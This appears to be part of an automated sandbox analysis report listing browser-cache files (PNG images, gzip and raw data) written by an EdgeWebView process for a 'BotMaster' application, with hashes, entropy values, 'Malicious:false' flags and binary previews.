                                                                                                                                                                                                                SSDEEP:768:xvtsoEV4kasEB83Dy1Ev4rEVhpuVogM5KQ3bafr9mO7Ua0XhN:xvHPka3BoD/v4AVh6nMcQ3k5ihN
                                                                                                                                                                                                                MD5:32C059D92C6C9DCEB08FA6F8815F5743
                                                                                                                                                                                                                SHA1:B6AB9CB8D5036627296C6FB4550B026F94C45B71
                                                                                                                                                                                                                SHA-256:6F69E05D88EC9CC620AACA8E6968532D027753D638250D6AA50D89783A9259C2
                                                                                                                                                                                                                SHA-512:3AF5E7388295E4FE5BC2FF81A8C25015C406924B7F764D8A21BDAD8580B833621E88178BA3AAB8429934BFA61BDA5989DCF19B59C03514F6F0835A08C981F4F1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....QY.!....V.....h.,.............t.U;......p$~$.B|...}...f....8...A`.N.DJ.`\..tE..T....Kg.u.g>.A.6h....F7..!....$@....!..P.3w>...K..2W....H2..K...^.].*.{'...iv.9v...w~...,sv..Y@n@...eRdl..q....+-.F.m48m9Z..'.=.'.{_.."...@e.#..Z.UF..Y./.ga"....E.).j).cTS...p6o....G..=.6S..........c....^~..FD.!3.Z....Y5..X.1.F._.....8lI.W..].}F<.Ju\.B..&.2.0.+....2.F......>..{.y..c.{...{..^..}.<....z?.......~.+.y).m..f..S.;`.._~.w..w/t.....<.w......^.{.vn"..x.b.Ky..?.?.R......z.L.Xgx.Ky..>r.]..97Uy.M..9.*....M....$hF..N<2..@8R...y-..%.z...x.yj...W1'f..*o.I.8....C..)N......e1E........2...p.#..3../._...Y....}..c.{...{.9;..l..1.....c...S......V.j..)Os.a.r.'.bL..O.1.U..\VNG.vfU`.....,me0.y.5.-;}......\..5..S..A...M:......vl.UlE...X0Oeh....]...w.|.....U.;.B.....5.37.{.$./.N.....98.8.C......<..M.O.1.}8i.G<u....O.Vqy.,G'...4!.=.6.;k..._...t.Xqb..l.0...G.'.G1(2...rc......L.@..(..J....isIF...~.....d.@..$zb...C...=.B...zT.%$...H>.......r...R.@..6`..h.K...\

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000011

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1235163
                                                                                                                                                                                                                Entropy (8bit):7.998934966193857
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:24576:Zri/YuWnUKtL8SfdCGi2/bKaJMUZs/587q84mfcNqcnMCsfFMeDyKp1:tgYuWUiAcbi2TTJMUWK4fAcWMeGKr
                                                                                                                                                                                                                MD5:45BFA234D28D947D096418C00478E7BD
                                                                                                                                                                                                                SHA1:8BDD2DE84B6375D0FDE0C56FC3D96A476ADD92F6
                                                                                                                                                                                                                SHA-256:F0F4C29BDD4AD238DFF8431C9D885954EE5D1EF33255A6B2A9A2088874EBE2C9
                                                                                                                                                                                                                SHA-512:C0AD155F775CDE9406B78073145C526EF550558BB06A930EB21B4ADDC87404ED32460D056E6889B1E348F66E0D60CE03F3F0DB4777D9643FC9DFF47A3271FF2B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....GT/..?l...|..Z..6......[Q......l......PUU....j?.._~.?../......k@....!0426153...b.u.6m.c.}...9v..s..].v..{..=y...w.>}.........v..Vf!m.Y(......}..qh..L...vOL.......7x^...S.....-.!t...+U..D.[r..@...V......N..t.h(.+..\c;..^A.EJfB.l.r.........9_h.W.J.v...(.......S....x...a.KK+_..`B...V....V..o...7.R..p..H.O...r...)INN.KG..M.1...P."....0..`.y.f]...5...|..BsU...D......y5v.._.WA.F.HT.v\...U..m.f...|....JD..,.JVnnpj.$....,'}.~...>..Z.X.X=.P*..x..s....A.oZ.}....R..@\.Fa.8N...]K.t...Zbl..Z.*.6...Z...)....n.<..G_.#.KU....rW;^j..$a.....e.Y.g.2..d........_.._H..,..<9^..mK.i.4..=.......{..f..=.v7).aO.Hv2aV.![J.$...&..3..[m-.z.@r...$Q..Q.%q.U...t|\.y)."...e.....=..y..^w.v.....i*.~..F....o@dgL.......ta..kt.:G_^_..:.{./..{ .......gwe.s:..s....../+.%..,.<.,...._~..W=b.(.1.........QD....w.j5.........$..U.~U..mi5cM...6$4..5....L...r.6@U..~.Sj..e_....P.f.BC..~i..Of2..U...S.=.T=Lv......U.I...l.}.{.........+"....g..'n.... ....."S..L.@..@..S...H.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000012

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 542 x 368, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):72043
                                                                                                                                                                                                                Entropy (8bit):7.968897738848062
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:G4tbQu4+yIKWLGKQ/CqiOHKOlgTGZ/E1Y6wOKu0/K:G24+vKxKQ/NKOlKGZ81YtO2i
                                                                                                                                                                                                                MD5:412B8ABD2FCF4DA09CC73111F70F8AE1
                                                                                                                                                                                                                SHA1:C9D65E9358413E295764EDE8554B03872A699658
                                                                                                                                                                                                                SHA-256:1D6FB3F461DAE242F797AA9B682A46C410D80242D5A66E91494FFA2868DBD428
                                                                                                                                                                                                                SHA-512:3B3EC005D295343E608161711096317D894A3C3BCEB7408984B43F581CE5A8A9780E29C1283567A09CFD7B2631D4FE21421BDFCAAC72A65B126BE53104756126
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.......p.......r....\iCCPICC Profile..(.u.=KB.....(J. ....A.>.5.E.X.`VXm.i.v.....hs..]l....P..B.T.M....v.VZ....r...B.K.....dM#...ox;...C....ZN...C2......[.G.[.#.hW.wq.R).....?.;..i.o...&8&...n.p.!O...l.....gV"..GK.q.Ga...O.p&..}.`..JdW.E.........DD.,..v..;....c.E...l...&!.H..1..$...Y...m..t..M/&.....]...A.>.\.~'.:s..J.]3..`Y.>.,B.hY.e....=..?...d........\eXIfMM.*...............................(...........i.........>.............................p..........iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <tiff:Compression>1</tiff:Compression>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:Orientation>1</tiff:Orientation>. <tiff:PhotometricInterpretation>2</t

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000013

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 542 x 375, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):88531
                                                                                                                                                                                                                Entropy (8bit):7.983780572309447
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:Z4LL2f7MUvtIIc/zCQyx6EdLcUZDxjAYyjM7cjTIHx6EXZyIixBEfxMk9yRJR2h:+vh+tIIc/zCQKlVjAYtojsoEZyI6EZM4
                                                                                                                                                                                                                MD5:51AB9E157944C50EF3C150A6DC6E6C53
                                                                                                                                                                                                                SHA1:7E7BBB54B2BDD1EB7C2C82E2DFD69A8A95AD242C
                                                                                                                                                                                                                SHA-256:2584D37657C548B74E8BE9EC01256BDC0EAE02867BE3674C9F6288608CB0AC7A
                                                                                                                                                                                                                SHA-512:67CB7B61FFFD97A1941B81CA74F4304EBC723342815D6C9E4AE71D9053FD04BFE11D8EF9685733A5614A6AB622D5B10A9D5E535E51DB4C5E3FA7629177D62995
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.......w.......BE...\iCCPICC Profile..(.u.=KB.....(J. ....A.>.5.E.X.`VXm.i.v.....hs..]l....P..B.T.M....v.VZ....r...B.K.....dM#...ox;...C....ZN...C2......[.G.[.#.hW.wq.R).....?.;..i.o...&8&...n.p.!O...l.....gV"..GK.q.Ga...O.p&..}.`..JdW.E.........DD.,..v..;....c.E...l...&!.H..1..$...Y...m..t..M/&.....]...A.>.\.~'.:s..J.]3..`Y.>.,B.hY.e....=..?...d........\eXIfMM.*...............................(...........i.........>.............................w....B.5.....iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <tiff:Compression>1</tiff:Compression>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:Orientation>1</tiff:Orientation>. <tiff:PhotometricInterpretation>2</t

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000014

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 202 x 403, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):105419
                                                                                                                                                                                                                Entropy (8bit):7.9950082201136965
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:3072:EaxcrX4HeY0G0gHokh4ZP7fkBNjPFgFOlR88+sOQOBd:vOrX4HB0G3IfZT+jmFOlRxO/
                                                                                                                                                                                                                MD5:67629C002BC59F6ADE80C5BCDDC9F7F5
                                                                                                                                                                                                                SHA1:9DAD7F3039FE965BC5D2C0AFDA2F6C4284DA28DA
                                                                                                                                                                                                                SHA-256:6E72CFA10B0BC1EC0B92693314683D470C5A7BCBB090EF169644FE7F2C2AE4B2
                                                                                                                                                                                                                SHA-512:6C9A9987FDD27E24688CA0934D423B1766E7B2AB49E16D9F323D546EF9D37E45B1FC4BFE47DF1831B34DB323C3B731CA3D67A018D995FEA9C49DB3112C147DB1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.............i..#....pHYs.................sRGB.........gAMA......a....`IDATx...i.-Yv....~.;...7.{/....."G...RH)4t..h!(..n0k....f..$...)JtA[A....c.*.......$...Sd.<...y<.........~..E...m....s..o...G................................................q...i.O.7^.~....3.?...<.3&.y.1NZ...p.<......S..g.=1...`,.O..I..{.....<../...#..<...0.).7.....N<..Jc.p....9.@4..4@........V...q.}r.<...,K7...]O.......q....z.. F......OP...i@....W..t..'n...xt:!I..$....mu...c...O...\m.).=.1..M..9.......v....nS..$:S9..s..=..7.Z7oiR.7...T..x.y..8../..yor_.9..<..]..\......=.p}...PM=w.Y....4.>....).&?.g....../...........$.z`...}W....W.MP.i.?.h....Y.l.;\.5...gd..7.....s.......;.[|Vz.:.t...5>..Y....f....>.....p}Q..3]..i.H...a..y....I.R....i....D.dm.....8.....r<.F..).c.......~....yz/O{.[...xe.|.{..n......<ymm..5.]2..s....M.#;.y......,y.tmj.8.N.3.6.C.x..c........ae.y..g.._|.`..g)...i._.K.....`/..}...?..C.2...w.IH.".)v.Y..+..._..g......C.k.|....q.8.{.{..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000015

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 306 x 266, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):63119
                                                                                                                                                                                                                Entropy (8bit):7.989903866741476
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:2WNShQR218VYkFdS8Q7fJ0qaRgAVPiyh7FNKYQCQ41wJm2c59y:2WUp8V/F9ofJoRgAVq8RoK1QcXy
                                                                                                                                                                                                                MD5:46CB41114F39DABA7723CC79F89C5BA7
                                                                                                                                                                                                                SHA1:350176BD2E7A34EB3AE36E6693897FC7CE3F6F80
                                                                                                                                                                                                                SHA-256:6BF61AFD25393AD2E70938787031F5A77AFDEFDCEE59096B3AC1391853E5EEE5
                                                                                                                                                                                                                SHA-512:1B63BE2896BB027A4113510FEC73449E1E24D80C784B349DEFB291C4405C8EB8A226F1B2C1FCFBDAD046D8EF27F063502B17B734E1DA0A46756470FEE33C6243
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...2.................pHYs.................sRGB.........gAMA......a....$IDATx.....d.y........>.*.w...F{xO..D#R.(..J+i%jG.=.C.9g(...F..:Q.D...a.4.............^v..R.j.lw.t.F..2##^.x...w.g..c..?........w.0..w&}>..u..)............/....a...........[.........r...k.y..rn?...k.....q............g.&o<.....?.,.....?...i.......]9.k...../...}.....d..q.tm:....a.Ob..?.OrX.....Sx.......X..:....._co.~.ZG.^...;.w>..9l..p8....z}........F..7..?....5t.2....t{....?o...P..:.o.........=.]....'..........o}...K.{..=t{./..!..!.../.=%.m.;..u1{....!N...Pd..,.<`...M.>..5.op8.</>...yroy.N.I.........]W.5'.>.}.i..^:p;...z..d....c|....y.V...S...../.ry.|n...:.6. _.a.V..=y....2.=..rz.8..../..h..Z.q..y...^......._n......aeui...:...m<..y..... ..........{Uo...Eg.[. .......;..wau..V..~..7..x.A......T:.R..z...D..F....s.xg.N..7.......Gq........ip..k+...."~..5.|.Dg3X.......s.Ad....}Z]p.B....+....h.......d.<...K./..G>.......>.S_.......y..d..x7:u..,.......-..-Tk.$gN.......v..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000016

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 320 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):88222
                                                                                                                                                                                                                Entropy (8bit):7.9925440332929565
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1536:DV5GMMMMNnQpKuSdTKW2LdQ+CO/bAPIo3jDTZBcuk4YoIzSvMj/6T2I9ITxyFwuM:DvHTZPSdTKW25Q+C2bQ/3rZ+4YoIteT4
                                                                                                                                                                                                                MD5:E3D93B1EDCB5C2AB9573D13D111A2E55
                                                                                                                                                                                                                SHA1:462BC0528640FDAB0A9D0DE8FCDC60037B2401BD
                                                                                                                                                                                                                SHA-256:2113EAE82F6404DA2180C0D3789A67573EFD14366293AD7A9FD6D7FAFB3B8D97
                                                                                                                                                                                                                SHA-512:1B54422F3D219C3E7A8567AC7384DB770BB172DA2BEBC8B865E4AD21DE867773FFF141010EDCCD6CD8BAE0276F613989A1FBF60588A61F73C653C491E6DF0CC3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...@................pHYs.................sRGB.........gAMA......a...X3IDATx.....m.U.......{o..TU*T.*....A...h.`.!18&/....#q....9.....>.....c.a..;.......D..HB.AM5.....9{..f.h...{.}.u.S{H..9.Y.\s.9....h#...F6...ld#...F6...l..J..............+.i........g.w.....K..5........~...{.z.......a.)...p^.Y?.....s..[s..9.. \......S..0...qu...G..6r.R.F...E`.d.'...~..~..&.$.5...|g.S..O...{..~...{d..{...3|L;V.....9>................<./.M..w.:.;...........?qm./.....'....w9.........{.......x.;j....?..`..........y.....3....v/........H.W~......e..,p..9..c.../.1.s..k.]~...ol6..6r ...e..../2L./../...i...O<...{..^~/..U....}Z.....c.N.=.g.....o..&.....}........8.7...........Y6.?.....k...........!.{..\}..._..O...........w...1F,c....w..=..M....._w.u.....G...ol...2.x...}.g..u...=..m......S.z.:~.6.hs0....#.Q..V.&...t..~.7\..;.]..o..=.z-E..^$.k.R....}!.....W..}...g..l2.~5..}w.|.....m(nV.....Ob..We../....t......[i..~.c\...c.%.s1r....W.\&.............

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000017

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 59423
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16720
                                                                                                                                                                                                                Entropy (8bit):7.985113491180524
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:WIOoebg/RAtmwDyEFH7WtbRMP9Z999EkEmBJ7371fseffATMH:WIKgImwtHatbRuZvmkEeJ7LLfATG
                                                                                                                                                                                                                MD5:D4C7D40AA4EAF8966697DB3DDB255C0F
                                                                                                                                                                                                                SHA1:E02FC63DF63400C9F1AF287C89990C465ED3C8F0
                                                                                                                                                                                                                SHA-256:E172B226AA08DA7019B4F7AF3332E0F0E56F14F18931582346AC4F146430B207
                                                                                                                                                                                                                SHA-512:9D95BF766076D8625259183ABE2469344A6834BDBC899CEFD5B5338CBFACE48F44A5566CE5C9696C21304C323F9DCA5F1B48356EB0364C82069BD292FD907396
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........}is.....+,U...A..,3!..dq.gu..*.....%YR$:.c.j,$.E.33..W..E.K.ht7zCp...^<..........[7o.k........;.$Y..[....:.a.....[.......r....7/....>......[...-t.t....l.......owz..M4."7:..$^.].(b(D.E.E.t.w..*fI3.AV;#|..1..?..U..Gi.k..w.0.....m..C..s.6.89_.E.3.;..>[..h..4...........6.,M.d..Q.w.N8K:...b.W.KP..7.~..Og...~..)......S...5....pq.i`F<.Y..:..]..F7M.Y.C.....'/.u..|.6..N.d.&...f.yH.^...~..i6.!.p...|'..'<_...4...,..r.!......_-~....K</5.......F....@u..].I.j..o...N...ug..d....\.:.yDNg.....j..G.w.c..;...'...vz..X..:9....a<...G.....,kx(.9.....W.lq.gh.k...c\...?'?..I....rF.h...o.G..7..o..w.......6..+.....51.[...>...b....<Y{(.!..F.Mq...2...t.xM.?.v....!"v%..7...c.^....9.....$...7.!.n>.l..4..;l1g$.p7.....9..k...w.-V..w]D.z.P......V.#.6.t....3U?d..jq.R/uc......}.u.s....l...1.#}o!....Aw.a.../^..fa.cs.0....Z.u...P.]..W.K{.B..{.%... K*.~.t..^._0.`....8l..Qn.....8.^..]....N.K .dD..<.K.d..X...Co".h.B.K..K}.]'...<....3..D...u.FW.......X........Do.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000018

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):892869
                                                                                                                                                                                                                Entropy (8bit):7.999291051889471
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:24576:szGr96V0PV8xn+W/Em9kUiRW3ecCm62qnLdxwPGi:seyn+T07VkmWnLdWGi
                                                                                                                                                                                                                MD5:BE1C26937EF0799A78B99360FBE6F8DC
                                                                                                                                                                                                                SHA1:6C5F77BC9626B1D592617EB38356CB0A40ED3DD5
                                                                                                                                                                                                                SHA-256:8B84587913E442B451C1D3AF6B1BDFDED7BC922A998789874CA266A1E83E812E
                                                                                                                                                                                                                SHA-512:C245109CE88934E2F3BCEAE730C80EBBACE776F884CB7B7C05516870667E354107ECBC50885A02E4F41F1C3565F53DF619970B93452248FCD401AD5BF63A3D01
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........Q.. ..........yxB....M..x......................J....WUUUU................_.._........?..?..................................................ML..-,..ml......9w..k7n....g/^.y...o?~.........j......$...NqB.)...H..j@......_..........t1g$`^I..UtL.&..5...!}S.v....tq.].L%l..olB.Y!.........*.C....|....K..d..J.$?S{....V#2...<.pL.....{....S.......v..=Ig..&....p.5..#.w:...}g...h.z..`....y..@Y..v..,.$j.)......../...z:..!..)}....x.|..@t1#*DHb..|_.._........zZ......v+...p@...S K.r.C........eu.,...HHtM.......3..7:..2.d...k...u.(.h...jT..@.1.M......`....`B.~......P.Q#u...r`3.C.;s..6.;.w,.............5U-!..:Mf.JB...&.R1*..sc.....r.K3..7....Q.i.vf...D9f..%h..VqC....d#..m......T3.Q..L.9Nr..s..r......C.Z.k.kY..u9=...4..eKN...x...#UEI.]"...............+%'..}..M;`.....N....p.M..H..........+r..AE.05...^......vl.#..hAdQ.4T..bw+"...Y...;.q..av##.pt.*I.,.B.<..qC.h..F..B..?.1._.\...7.3s.....`..0..X.>..=....~..(.~Q6...?.W.....Eq.Y.p.&..eR...+.n.;.......$......("..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000019

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 156943
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):43583
                                                                                                                                                                                                                Entropy (8bit):7.994501341543126
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:4upYWV6xkXIRXgaU4orcpikxUs592WXdMAcbXfb84oXiDXKh1GzAm12:rHsL4g6snNzcjfsMal
                                                                                                                                                                                                                MD5:BA0886BFF706EF8F0A769E886677C860
                                                                                                                                                                                                                SHA1:74023F52F51EF429C962177ED1F1B314BEFF824D
                                                                                                                                                                                                                SHA-256:AAC9BAF40A9655DCBC22BD1CDDF0B8CFE49B8609941C3BD114DAA07DB3C6014C
                                                                                                                                                                                                                SHA-512:42665DAD917AD6C6B85D4284AF79A8DAFD8240E940B9E31C3C2E41C8725035618F1DF0446402438AA7A26B0B543D3E3FA723C314BD457775B2A78662DDD9B6CA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............i{...(...~..];.*.cg....Ie.Jw*....qe.. .$.\.3t...^K.H ..{.~.9..b@Z.....5:.o.>.....?8<9..v.......4>.8 .~.g..z7..Lc?.....C>..A....$I..}>=....../..N..::..wr.<>.|}.waw...Y-..|}xyio!..m.........g...;.........o...........>.....) .7...B.4.,.a.8._p.b.D.$b>._}....z.......7..O../.-.>......}'..N..m.p...A<...jov.......fQ...4....>...'..{S<..nU.z...$.F.'..EC5..iey......5t......P.z.Ga.~.u1...}..Iz.f9.I.z...-w...n..9@.\..I..O..x.A...W.^..'....4n.J..7o...=$.~..$.3MU^....e...2.p`.y....av.&....,...i9....?.pAH.....xy.i..5HR/..........8y..\.>..1.....ms...Jg9.W(2.Nn:....|... .r.IjB...8..~;".0.9kk........:..I.-...A...i.q...O...\"..!QF(..c.\..\....$.Z.{.NbV...!..?.<.*.4.5.k'q6..r=.....R....i..c.;.quz.g... .. ...R..0c.A.].=.f.6.L.'.G.uN,.V.^.Bj.l.........i9=...(I.dx........&Q` ...t/.?.....$ .I...).q... q....#......A..~..&.w..A.d...M....y<....G..."....{.(.qD......c.s....t....dBp.~D.W..)-.E!{1.Q..'Q.E.....7,.;Zj...<-~......yrB;t.<.t......d...K(..p...

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00001a

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 57094
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17139
                                                                                                                                                                                                                Entropy (8bit):7.986314303609619
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Ni1JRWkxh6OhiKOUfe2IPylFwoJY5mALJXocfZvUgd:01JnfhiKZFieVJemuJX3vLd
                                                                                                                                                                                                                MD5:70FDE7F58E6B61CBA10748DD797C8BF5
                                                                                                                                                                                                                SHA1:182801C6772505F4279E17DF0CB9AC5F1AC1EB7D
                                                                                                                                                                                                                SHA-256:60D6D094B90A27D51837A50088F55944E4A2311BE280598F4A989086979A1B11
                                                                                                                                                                                                                SHA-512:0003D7D6780ED42D92279485DD59605C55C7BEDC9FA53373C96AA686F4AE7D9E9C84FD17DD9B4477018FF2EFE6F9101A368D724E4CDCAA112E7D7EFB346565CE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:...........}mw.8....W..]...7$.7.'.$t7;I..{.aX.l..`l.6y...S.l....3sw.....R.J.R.TU.....dp....Y..s.......V....N.o.)..Xa...`....J....b7.U.Mla.S..!..{.M.2.b.o..\.-......v.......ag2.>..7....S.r.N..ZT...L..O.U.+..;...]....Qt..?r!;...$.2b96.h.@.cX..".3....].Xd..BZQj&.]G%...\.4_MSM.`......t.<.f.G....j-.K.E...l......s..m.o.9.[......"........H.q......+.E....a.....)/...v.K....4.?.^...t....8-. ..15V.a..lB.XK~.=..0...._.n...68.;99o#=%+GE....<.n...T..!Z...*...-..5..<o......Z.Y..k,.8.M.!.".5h..x.z.J.r......:..;......_.....h|.....kY...g..%..t...$..Fsbt.{j..R.;U.7......e.s.....|{..9o.v..ME.Pp......T..._....M..U.ew.<.\..J.SY"..F...{..fH.;.1$.).?.._).>....WJ..f..D..?.~..@...P..47...Ws.Q0..kF;i.0...Z.v.#.$........C..z.h........V..).......a(Q...P9..&YR.>M.0..2......H....UB[E.2.?)X...<.......a.q.%..j...R........V.......VNi...|..n..C.....F.W..r.Lh\y..VQj...Vj.j..:.v.<.MEA5.. ......A..t.F..Z0........Xq...>.......yj..d}*..R..$M.'AJ...J.~m.hS.Cc.K.f)_H4..l..y#.g..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00001b

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 202 x 404, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):75408
                                                                                                                                                                                                                Entropy (8bit):7.993080268672035
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1536:4SLu96RTHaQIzZk8kKx4mVur9iEO60FuiUc0q0kbk4y80:WeZ668DWmsr9iElEjUrkbk4K
                                                                                                                                                                                                                MD5:E91E18E7E72B86EE14830DD3879003DC
                                                                                                                                                                                                                SHA1:B0E055F8C2B1B372A40B3070BEC7A727B258BBAA
                                                                                                                                                                                                                SHA-256:17D02AC4C2EA1E55599DF1D7B9622057FAB244CEB2D60AAC34759B63FB79148F
                                                                                                                                                                                                                SHA-512:45C83F1ED85A5CE971D3B67D2004FF1BCAD8258513DDC76E24CF7A39EEA78F8D4E3F386B8BF56D8EFA962835570A8BD72A5DA81DE305AAE1906C590E3C038964
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.............t.......pHYs.................sRGB.........gAMA......a...&%IDATx.....n.U.......O..j..ZB...F...$.$...l./....s}o.pc_|..AHr..}....Il?v.. l.F...jF.b..@R...[=......{Wj..U..7..$.).....w..Ukx.Dt.]l...v.]l...v.]l...v.]l...v.]l...v.]l...v.]l.........S.Y~...3...g~]...w.i.}.c.m....K.O._.?..]..~.:n.o|6.s...3.x..s.nkc.u....?....(....^..Z.}......~g[.q.....W>#.G;I.../^....=C.f...Oz...p/.[...3...x.;..........c..rH:.f.....{.7>.....}.&.8..../....|'6c..|..xS.........md.n..........u.k.Z......1tk.q...;...~..K.9.C......o.//\R.w.I..O../_.{..k.%.....:..M......B..q.\C./\..o.=..?Y."}..C.X.=...c|.y.}e<.\e.[}.|..c.....v..y.X.1\..cy.>....Y...{i.......o=.?.A..q...g.DR..v....;w.......o_Y~....b{..Bn..f...W..._.c...!..T.>(....n...?,.......j..1.?.N.o..=....."..e.C6.....^"..R....;........k.b..^.v...W......_.._O..v[.au......KpX^.2...=$o...Y~..t.\l.s.....B...-oyK.......|@..rh...)...}h.Q.E.l..e......v..n............w...=XW)J...^0gyA..P.(L..M..xH..

